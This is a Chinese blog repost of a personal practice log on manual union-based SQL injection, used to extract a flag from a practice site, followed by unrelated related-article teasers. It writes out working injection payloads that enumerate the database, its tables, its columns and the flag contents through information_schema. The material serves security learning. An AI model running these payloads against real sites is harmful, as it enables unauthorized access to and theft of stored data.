sql手工注入练习拿flag

news2024/11/25 4:23:25

sql手工注入练习拿flag

记录一下自己重新开始学习web安全之路⑤。

1、找注入点

①url ②搜索框 ③登录框

2、找交互点

用单引号判断是否存在交互点，发现回显不正常，说明url存在有交互点

3、判断类型（char类型）

利用and 1=1 和 and1=2，进行判断，当两次回显的页面是一样的，则说明是char类型

4、判断列数（order by）

输入语句?id=2’ order by 1#时，发现回显不正常。

这是因为注释符的原因，将注释符 # 改为 --+

利用二分法，判断列数为3列

5、查看回显位置（union 联合 select 查询）

?id=2’ and 1=2 union select 1,2,3–+

发现第二列，第三列有回显，第一列没有回显

6、查看数据库名称（message）

?id=2’ and 1=2 union select 1,database(),3–+

查询到数据库名称为message

7、查看数据表名称（flag、user，username）

?id=2’ and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema = ‘message’–+

8、查看数据列名称(flag,user,username)

?id=2’ and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema = ‘message’ and table_name = ‘flag’–+

9、查看数据(flag,id)

?id=2’ and 1=2 union select 1,concat(id,‘—’,flag),3 from flag–+

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.coloradmin.cn/o/346293.html

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈，一经查实，立即删除！

相关文章

Linux Shell脚本讲解

Linux Shell脚本讲解

目录 Shell脚本基础 Shell脚本组成 Shell脚本工作方式编写简单的Shell脚本 Shell脚本参数 Shell脚本接收参数 Shell脚本判断用户参数文件测试与逻辑测试语句整数测试比较语句字符串比较语句 Shell流程控制 if条件判断语句单分支双分支多分支 for循环语句…

阅读更多...

第五章.与学习相关技巧—参数更新的最优化方法（SGD,Momentum,AdaGrad,Adam）

第五章.与学习相关技巧—参数更新的最优化方法（SGD,Momentum,AdaGrad,Adam）

第五章.与学习相关技巧 5.1 参数更新的最优化方法神经网络学习的目的是找到使损失函数的值尽可能小的参数，这是寻找最优参数的问题，解决这个问题的过程称为最优化。很多深度学习框架都实现了各种最优化方法，比如Lasagne深度学习框架&#xf…

阅读更多...

Vue中使用天地图

Vue中使用天地图

Vue项目引入天地图在vue的静态资源目录下的index.html中引入天地图的底图，开发天地图源码路径：天地图API 方法一：加载天地图，引用：public/index.html <script type"text/javascript" src"http:/…

阅读更多...

来来来，手摸手写一个hook

来来来，手摸手写一个hook

hello，这里是潇晨，今天就带着大家一起来手写一个迷你版的hooks，方便大家理解hook在源码中的运行机制，配有图解，保姆级的教程，只求同学一个小小的👍，🐶。第一步&#xf…

阅读更多...

【软件测试】团队测试技术体现，遇到不可复现bug处理方式......

【软件测试】团队测试技术体现，遇到不可复现bug处理方式......

目录：导读前言一、Python编程入门到精通二、接口自动化项目实战三、Web自动化项目实战四、App自动化项目实战五、一线大厂简历六、测试开发DevOps体系七、常用自动化测试工具八、JMeter性能测试九、总结（尾部小惊喜）前言测试技术带来的是PP…

阅读更多...

ThingsBoard-规则链-check alarm status

ThingsBoard-规则链-check alarm status

1、概述从今天开始，专门讲解ThingsBoard的规则链，每一个节点都会详细讲解，并且配套案例，让大家都能理解，喜欢请点个关注。今天讲的是筛选器的第第一个节点【check alarm status】，意思是检测告警状态。 2、节点理解 2.1、概述【check alarm status】节点如图所示：…

阅读更多...

解立方根-蓝桥杯

解立方根-蓝桥杯

题目分析主要是运用二分法使复杂度减低。代码 #include<iostream> #include<iomanip> #include<cmath> using namespace std; #define double long double const double eps 1e-12; int main() {int T 1;cin >> T;while (T--){double n;cin &g…

阅读更多...

LMS 最佳实践：学习管理系统中的知识管理！

LMS 最佳实践：学习管理系统中的知识管理！

企业需要在整个组织中收集、存储和传播知识。我们被信息淹没了，因此应该充分利用学习管理系统（LMS）来组织业务资产并支持知识管理（KM）战略。LMS 不仅仅是一个捕获电子学习单元和多项选择题的系统。它很可能没有充分发挥…

阅读更多...

代码随想录算法训练营第二十八天 | 491.递增子序列，46.全排列，47.全排列 II

代码随想录算法训练营第二十八天 | 491.递增子序列，46.全排列，47.全排列 II

一、参考资料递增子序列题目链接/文章讲解：https://programmercarl.com/0491.%E9%80%92%E5%A2%9E%E5%AD%90%E5%BA%8F%E5%88%97.html 视频讲解：https://www.bilibili.com/video/BV1EG4y1h78v 全排列题目链接/文章讲解：https://programmercarl.…

阅读更多...

从零学架构-基础部分

从零学架构-基础部分

一、架构的基础将学习的架构设计知识总结出来，分享给大家。1.1什么是架构架构和框架是什么关系？有什么区别?Linux有架构，MySQL有架构，JVM也有架构，应该关注哪个架构？金融有架构，支付有架构&…

阅读更多...

【排序算法】数据结构排序详解

【排序算法】数据结构排序详解

前言： 今天我们将讲解我们数据结构初阶的最后一部分知识的学习，也是最为“炸裂”的知识---------排序算法的讲解！！！！ 目录1.排序的概念及其运用1.1排序的概念1.2排序运用2.常见排序算法的实现2.1 插入排序2…

阅读更多...

Java 基础面试题——集合

Java 基础面试题——集合

目录1.Java 有哪些常用容器（集合）？2.Collection 和 Collections 有什么区别？3.List、Set、Map 之间的区别是什么？4.HashMap 的长度为什么是 2 的 N 次方？源码中是如何保证的？5.HashMap 和 Hasht…

阅读更多...

ChatGPT 下一步，分配对象脱单有望

ChatGPT 下一步，分配对象脱单有望

ChatGPT 火了，上一次这么热闹还是上一次……那时最紧俏的概念叫元宇宙。混沌时期，鱼龙混杂。资本市场靠新故事造梦，科技巨头争相加入竞赛，也有脑子活泛的已经利用它的巨大热度搞上了小钱钱——活跃在某宝某鱼上，贩卖…

阅读更多...

2023版Java面试汇总！全面对标阿里P7，学完，化身offer收割机

2023版Java面试汇总！全面对标阿里P7，学完，化身offer收割机

最近内卷严重，各种跳槽裁员，本文主要是为了帮大家快速回顾Java中知识点，这套（详细笔记/面试题）它几乎涵盖了所有的Java技术栈面试题和答案，相信可以帮助大家在金三银四，最短的时间内用作学习和面…

阅读更多...

基于微信小程序的优选驾考小程序

基于微信小程序的优选驾考小程序

文末联系获取源码开发语言：Java 框架：ssm JDK版本：JDK1.8 服务器：tomcat7 数据库：mysql 5.7/8.0 数据库工具：Navicat11 开发软件：eclipse/myeclipse/idea Maven包：Maven3.3.9 浏览器…

阅读更多...

SpringBoot查询接口传入参数为List，XML的写法

SpringBoot查询接口传入参数为List，XML的写法

✉️ 查询业务 ➿ 目前互联网项目的诸多业务中数查询业务居多，而查询业务中又数展示类接口、报表类接口是我们接触最多的查询类接口。在实际项目中，不是全局查询数据就做完了业务，这样的需求也没有意义。条件查询因此作为最普遍的查询业务&am…

阅读更多...

软件测试之优秀的产品质量评估模型的特征

软件测试之优秀的产品质量评估模型的特征

产品质量评估中的几个场景： 场景1：项目计划的时间到了，就发布产品。场景2：将缺陷修复率作为产品的质量目标。产品必须达到一定的缺陷修复率，才能发布。场景3：我们为产品建立了很多指标来作为质量目标&…

阅读更多...

报表开发工具FastReport .Net 如何在移动端生成Web报表应用？

报表开发工具FastReport .Net 如何在移动端生成Web报表应用？

FastReport .Net是一款全功能的Windows Forms、ASP.NET和MVC报表分析解决方案，使用FastReport .NET可以创建独立于应用程序的.NET报表，同时FastReport .Net支持中文、英语等14种语言，可以让你的产品保证真正的国际性。专业版和企业版包括Fast…

阅读更多...

软件测试1-测试就是找茬游戏

软件测试1-测试就是找茬游戏

软件测试是找茬游戏以前有一个很火的游戏叫《大家来找茬》，我玩这个游戏很厉害，在这个游戏中，两幅图中有几个不一样的地方，有些地方很明显，一眼就能看到，有的地方隐藏得比较深，要仔细看才能看清…

阅读更多...

2PC（两阶段提交）方案

2PC（两阶段提交）方案

XA方案2PC的传统方案是在数据库层面实现的，如Oracle、MySQL都支持2PC协议，为了统一标准减少行业内不必要的对接成本，需要制定标准化的处理模型及接口标准，国际开放标准组织Open Group定义了分布式事务处理模型DTP（Dist…

阅读更多...

推荐文章

最新文章